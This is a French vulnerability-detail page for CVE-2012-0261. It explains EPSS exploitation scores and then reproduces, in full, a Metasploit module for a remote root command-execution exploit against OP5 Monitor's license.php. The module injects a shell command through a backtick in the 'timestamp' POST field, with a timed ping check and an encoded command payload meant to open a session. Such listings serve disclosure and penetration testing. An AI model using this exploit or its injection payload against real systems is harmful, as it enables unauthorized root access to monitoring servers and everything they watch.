CVE-2012-0261 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'OP5 license.php Remote Command Execution', 'Description' => %q{ This module exploits an arbitrary root command execution vulnerability in the OP5 Monitor license.php. Ekelow has confirmed that OP5 Monitor versions 5.3.5, 5.4.0, 5.4.2, 5.5.0, 5.5.1 are vulnerable. }, 'Author' => [ 'Peter Osterberg <j[at]vel.nu>' ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2012-0261'], ['OSVDB', '78064'], ['URL', 'http://secunia.com/advisories/47417/'], ], 'Privileged' => true, 'Payload' => { 'DisableNops' => true, 'Space' => 1024, 'BadChars' => '`\\|', 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'perl ruby python', } }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Targets' => [[ 'Automatic', { }]], 'DisclosureDate' => 'Jan 05 2012', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(443), OptString.new('URI', [true, "The full URI path to license.php", "/license.php"]), ], self.class) end def check vprint_status("Attempting to detect if the OP5 Monitor is vulnerable...") vprint_status("Sending request to https://#{rhost}:#{rport}#{datastore['URI']}") # Try running/timing 'ping localhost' to determine is system is vulnerable start = Time.now data = 'timestamp=1317050333`ping -c 10 127.0.0.1`&action=install&install=Install'; res = send_request_cgi({ 'uri' => normalize_uri(datastore['URI']), 'method' => 'POST', 'proto' => 'HTTPS', 'data' => data, 'headers' => { 'Connection' => 'close', } }, 25) elapsed = Time.now - start if elapsed >= 5 return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit print_status("Sending request to https://#{rhost}:#{rport}#{datastore['URI']}") data = 'timestamp=1317050333`' + payload.encoded + '`&action=install&install=Install'; res = send_request_cgi({ 'uri' => normalize_uri(datastore['URI']), 'method' => 'POST', 'proto' => 'HTTPS', 'data' => data, 'headers' => { 'Connection' => 'close', } }, 25) if(not res) if session_created? print_status("Session created, enjoy!") else print_error("No response from the server") end return end end end